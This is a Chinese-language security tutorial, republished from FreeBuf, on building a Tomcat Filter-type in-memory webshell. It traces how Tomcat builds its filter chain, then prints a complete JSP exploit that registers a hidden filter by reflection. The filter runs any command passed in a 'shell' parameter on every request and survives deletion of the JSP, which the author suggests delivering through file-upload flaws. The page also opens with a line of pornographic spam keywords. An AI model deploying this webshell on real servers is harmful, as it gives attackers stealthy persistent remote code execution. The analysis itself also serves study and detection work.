偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

Java內(nèi)存馬連續(xù)劇——Filter內(nèi)存馬

作者:XiLitter
安全 應(yīng)用安全
注入成功后,我們對服務(wù)器訪問任何請求,都會執(zhí)行惡意代碼。而且當(dāng)jsp文件刪除后,木馬仍然有效。它存在當(dāng)前的web應(yīng)用上下文中,所以重啟服務(wù)器就沒了。

知識基礎(chǔ):

剛開始內(nèi)存馬的這塊學(xué)習(xí)與反序列化并無太大關(guān)系,反而與javaweb,tomcat聯(lián)系更加緊密。所以在學(xué)習(xí)內(nèi)存馬之前需要先了解JSP,java web的三大件,Servlet,F(xiàn)ilter,Listener的基本知識和工作流程和Tomcat 架構(gòu)的相關(guān)內(nèi)容。

0x01 什么是Filter馬

內(nèi)存馬就是無文件木馬,無文件落地,它通常會存在進程,內(nèi)存或者java虛擬機中,特點更加隱蔽,難以排查,并且也難以刪除。而今天學(xué)習(xí)的Filter內(nèi)存馬是傳統(tǒng)web應(yīng)用型內(nèi)存馬,主要將惡意代碼注入到過濾器中,當(dāng)過濾器攔截servlet請求的參數(shù)時,過濾器中的惡意代碼就會執(zhí)行。

0x02 環(huán)境搭建

首先配置一個 servlet 的web項目,

1.png1.png

然后一直點下一步就好了,它會自動幫我們生成一個簡單的servlet。

pom.xml中導(dǎo)入tomcat相關(guān)依賴:


<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-catalina</artifactId>
<version>9.0.38</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-websocket</artifactId>
<version>9.0.38</version>
</dependency>


方便之后調(diào)試代碼,在這之后我們創(chuàng)建一個自定義的Filter過濾器


package com.example.memoryhorse;
import javax.servlet.*;
import java.io.IOException;

public class MyFilter implements Filter{

@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
System.out.println("執(zhí)行過濾功能");
servletRequest.setCharacterEncoding("utf-8");
servletResponse.setCharacterEncoding("utf-8");
servletResponse.setContentType("text/html;charset=UTF-8");
filterChain.doFilter(servletRequest,servletResponse);
System.out.println(servletRequest.getParameter("cmd"));
Runtime.getRuntime().exec(servletRequest.getParameter("cmd"));
}
}


重寫了doFilter方法,里面添加惡意代碼,接收cmd參數(shù),執(zhí)行任意命令。web.xml中配置相關(guān)參數(shù)


<filter>
<filter-name>MyFilter</filter-name>
<filter-class>com.example.memoryhorse.MyFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>MyFilter</filter-name>
<url-pattern>/MyFilter</url-pattern>
</filter-mapping>


這里我定義的是/MyFilter路由,在訪問這個路由時,就會被我們自定義的過濾器攔截。

0x03 Filter內(nèi)存馬探索

這個時候是不是就有點像內(nèi)存馬的樣子,我們注冊了一個惡意的 /MyFilter 路由,訪問這個路由可以執(zhí)行任意代碼。測試一下。

2.png2.png

成功彈出計算器,這也是注入Filter內(nèi)存馬的一個抽象的體現(xiàn)。然而在實際攻防場景中,我們不可能在別人服務(wù)器上插入自己自定義的過濾器,web.xml這個配置文件也不是那么容易修改,就算修改了配置文件也很好排查,起不到隱秘的效果,要想動態(tài)的注冊Filter馬,就必須弄清楚過濾器的創(chuàng)建和調(diào)用過程。

1.tomcat Filter 的流程分析

在MyFilter的doFilter方法里下個斷點,訪問/MyFilter路由,會被我們自定義的過濾器攔截,doFilter方法是處理過濾功能的方法,開始調(diào)試。

3.png3.png

這個filterChain是一個過濾器鏈,通過調(diào)試看到里面存放著兩個過濾器,一個是我們自定義的,一個是 tomcat 自帶的,跟進它的doFilter方法。

判斷 Globals.IS_SECURITY_ENABLED 安全模式是否開啟,這里判斷false。

4.png4.png

跟進 internalDoFilter 方法。

5.png5.png

filters 是過濾器鏈數(shù)組,取數(shù)組的下標(biāo),遍歷過濾器,賦值給filterConfig。

6.png6.png

此時的過濾器為WsFilter 調(diào)用它的doFilter方法,跟進看一下。

7.png7.png

這里的判斷 是否滿足WebSocket握手的特殊條件,而且是否已經(jīng)配置了相應(yīng)的類來處理WebSocket連接,如果兩個都不滿足,然后回調(diào)用過濾器鏈中的下一個過濾器。繼續(xù)跟進。

又回到了 internalDoFilter 方法,此時pos=2,不滿足if條件。也就是說當(dāng)過濾器遍歷完后,就會調(diào)用 service 方法處理具體的業(yè)務(wù)請求。

8.png8.png

事實上可以定義多個過濾器,當(dāng)攔截請求后,從filterChain 中一個個調(diào)用doFilter方法,最終執(zhí)行 service 方法。

那么Filter鏈?zhǔn)窃趺匆徊讲絼?chuàng)建的,我們要注冊一個惡意的Filter進去就需要了解Filter鏈的創(chuàng)建過程。

9.png9.png

通過執(zhí)行流可以看到不斷調(diào)用 invoke 方法,跟進最后一個 invoke方法,也就是 StandardWrapperValve 類的 invoke 方法。

10.png10.png

這里已經(jīng)創(chuàng)建好了 Filter鏈,往上翻代碼。

11.png11.png

createFilterChain 就是創(chuàng)建Filter鏈的重要方法,進入到這個方法下個斷點,開始調(diào)試。

12.png12.png

這里實例化一個filterChain,設(shè)置了當(dāng)前過濾器鏈中的 Servlet,然后獲取當(dāng)前 Servlet 包含在的上下文,從調(diào)式信息就可以看到是 StandardContext 對象,最后定義一個filterMaps 獲取了當(dāng)前上下文中的過濾器映射。

13.png13.png

此時的filterMaps就獲取到了兩個過濾器,到后面會對filterMaps進行兩次遍歷。

這段代碼的目的是將根據(jù) URL 和 Servlet 名稱匹配的過濾器配置添加到過濾器鏈中,以確保在請求處理過程中應(yīng)用適當(dāng)?shù)倪^濾器。匹配過濾器配置時,會檢查 Dispatcher 類型、URL 和 Servlet 名稱,然后將匹配的過濾器配置添加到過濾器鏈中。如果沒有匹配的過濾器配置,繼續(xù)處理下一個過濾器映射。

14.png14.png

filterConfig 是通過調(diào)用context上下文的findFilterConfig方法獲取,filterConfigs是一個Map,從里面拿。

15.png15.png

最后通過 addFilter 方法將過濾器添加到鏈中。

2.攻擊思路分析

過濾器是從filterConfigs這個Map里拿的,那么我們把惡意的Filter添加進 filterConfigs 里,等它取出來,添加到Filter鏈中就可以了,那么接下來怎么構(gòu)造過濾器,也就是filterConfig,看調(diào)試信息。

16.png16.png

首先獲取上下文context,然后就是自定義的filter代碼,最后一個filterDef就是對應(yīng)web.xml中對filter的配置,fiterConfig的相關(guān)內(nèi)容都是從context中得到。


FilterDefs:存放 FilterDef 的數(shù)組 ,F(xiàn)ilterDef 中存儲著我們過濾器名,過濾器實例
等基本信息
FilterConfigs:存放 filterConfig 的數(shù)組,在 FilterConfig 中主要存放 FilterDef 和
Filter 對象等信息
FilterMaps:存放 FilterMap 的數(shù)組,在 FilterMap 中主要存放了 FilterName 和 對
應(yīng)的 URLPattern


所以只要我們將filter ,F(xiàn)ilterDefs,F(xiàn)ilterMaps添加到FilterConfigs中就可以添加filter了。

貼上別的師傅的流程圖:

17.png17.png

其中這里涉及到了幾個類:


ServletContext:
javax.servlet.ServletContextServlet規(guī)范中規(guī)定了的一個ServletContext接口,提供了Web應(yīng)用所有Servlet的視圖,通過它可以對某個Web應(yīng)用的各種資源和功能進行訪問。WEB容器在啟動時,它會為每個Web應(yīng)用程序都創(chuàng)建一個對應(yīng)的ServletContext,它代表當(dāng)前Web應(yīng)用。并且它被所有客戶端共享。 

ApplicationContext:
org.apache.catalina.core.ApplicationContext
對應(yīng)Tomcat容器,為了滿足Servlet規(guī)范,必須包含一個ServletContext接口的實現(xiàn)。Tomcat的Context容器中都會包含一個ApplicationContext。

StandardContext:
Catalina主要包括Connector和Container,StandardContext就是一個Container,它主要負(fù)責(zé)對進入的用戶請求進行處理。實際來說,不是由它來進行處理,而是交給內(nèi)部的valve處理。
一個context表示了一個外部應(yīng)用,它包含多個wrapper,每個wrapper表示一個servlet定義。(Tomcat 默認(rèn)的 Service 服務(wù)是 Catalina)


引用師傅的解釋,當(dāng)前這是前面tomcat架構(gòu)的內(nèi)容,所以基礎(chǔ)內(nèi)容還是要了解。

0x04 Filter內(nèi)存馬exp編寫

通過反射創(chuàng)建上面需要的幾個對象:


<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.catalina.core.ApplicationContextFacade" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.HashMap" %>
<%@ page import="java.io.IOException" %>
<%


//請求對象 request 中獲取 ServletContext 對象。
ServletContext servletContext = request.getServletContext();
//ApplicationContextFacade 是 Spring 框架中的一個類,用于封裝 Spring 的 Web 應(yīng)用程序上下文。
ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext;
//通過反射獲取上下文
Field applicationContextFacadeContext = applicationContextFacade.getClass().getDeclaredField("context");
applicationContextFacadeContext.setAccessible(true);


// context 字段,即 Spring 的應(yīng)用程序上下文對象。通過反射獲取到該字段的值,它被強制轉(zhuǎn)換為 ApplicationContext 類型
ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeContext.get(applicationContextFacade);
//從 ApplicationContext 類中獲取一個名為 "context" 的私有字段。這個字段存儲了實際的 Spring 應(yīng)用程序上下文對象
Field applicationContextContext = applicationContext.getClass().getDeclaredField("context");
applicationContextContext.setAccessible(true);
//類型轉(zhuǎn)換standardContext,標(biāo)準(zhǔn)的web應(yīng)用程序上下文
StandardContext standardContext = (StandardContext) applicationContextContext.get(applicationContext);


//創(chuàng)建filterConfigs
Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs");
filterConfigs.setAccessible(true);
HashMap hashMap = (HashMap) filterConfigs.get(standardContext);
String filterName = "Filter";
if (hashMap.get(filterName)==null){
//構(gòu)造filter對象
Filter filter = new Filter() {
@Override
public void init(FilterConfig filterConfig) throws ServletException {
System.out.println("filter初始化");
}


@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
servletRequest.setCharacterEncoding("utf-8");
servletResponse.setCharacterEncoding("utf-8");
servletResponse.setContentType("text/html;charset=UTF-8");
filterChain.doFilter(servletRequest,servletResponse);
System.out.println(servletRequest.getParameter("shell"));
Runtime.getRuntime().exec(servletRequest.getParameter("shell"));
System.out.println("執(zhí)行過濾");
}


@Override
public void destroy() {
}
};
//構(gòu)造filterDef對象
FilterDef filterDef = new FilterDef();
filterDef.setFilter(filter);
filterDef.setFilterName(filterName);
filterDef.setFilterClass(filter.getClass().getName());
//將過濾器的配置信息添加到應(yīng)用程序上下文中
standardContext.addFilterDef(filterDef);


//構(gòu)造filterMap對象
FilterMap filterMap = new FilterMap();
//添加映射的路由為所有請求
filterMap.addURLPattern("/*");
filterMap.setFilterName(filterName);
filterMap.setDispatcher(DispatcherType.REQUEST.name());
//將上述設(shè)置好的過濾器映射對象添加到 StandardContext 中,并將其插入到已有的過濾器映射之前
standardContext.addFilterMapBefore(filterMap);


//構(gòu)造filterConfig
Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
constructor.setAccessible(true);
ApplicationFilterConfig applicationFilterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);


//將filterConfig添加到filterConfigs中,即可完成注入
hashMap.put(filterName,applicationFilterConfig);
response.getWriter().println("注入完成");
}
%>


為什么要寫jsp文件,因為在實際場景中,可以通過文件上傳漏洞將這個jsp馬上傳上去完成內(nèi)存馬的注入。注釋上寫了,分步編寫exp。

18.png18.png

注入成功后,我們對服務(wù)器訪問任何請求,都會執(zhí)行惡意代碼。而且當(dāng)jsp文件刪除后,木馬仍然有效。它存在當(dāng)前的web應(yīng)用上下文中,所以重啟服務(wù)器就沒了。

參考鏈接:

https://xz.aliyun.com/t/10888

本文作者:XiLitter, 轉(zhuǎn)載請注明來自FreeBuf.COM

責(zé)任編輯:武曉燕 來源: ???FreeBuf.COM?
服務(wù)器木馬jsp
相關(guān)推薦

2023-04-06 10:26:25

Java內(nèi)存馬Jetty

2013-09-17 09:52:05

搜狗BAT

2013-10-12 13:01:51

Linux運維內(nèi)存管理

2010-06-30 16:37:46

2015-09-02 10:48:22

2013-10-22 10:23:12

2009-08-15 10:24:48

2010-08-27 13:49:56

2011-09-15 19:11:53

內(nèi)網(wǎng)安全

2011-03-25 10:23:22

2009-08-10 16:20:13

2009-02-03 15:37:50

2009-06-02 09:09:36

2010-09-14 20:02:14

2010-11-01 16:14:29

2019-08-29 15:43:24

人工智能AI開發(fā)者

2009-09-17 12:55:24

2009-04-28 13:18:42

卡飯社區(qū)惡意代碼金山毒霸
點贊
收藏

51CTO技術(shù)棧公眾號